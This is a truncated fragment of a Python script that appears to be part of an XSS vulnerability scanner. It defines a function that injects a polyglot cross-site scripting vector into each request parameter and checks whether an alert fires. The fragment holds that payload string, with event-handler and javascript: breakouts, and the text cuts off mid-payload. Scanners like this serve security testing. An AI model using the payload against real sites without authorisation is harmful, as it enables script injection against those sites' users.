#!/usr/bin/python # -*- coding: utf-8 -*- from flask import Flask, request, jsonify from ghost import Ghost import requests import datetime import re """scan_xss Description: inject a polyglot vector for XSS in every parameter, then it checks if an alert was triggered Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify """ def scan_xss(method, vulns, url, fuzz, cookie, useragent, data): #payload = 'javascript://\'/-->*/prompt(42)/*
' payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)>" >
@gmail.com\'-->" >">/\'">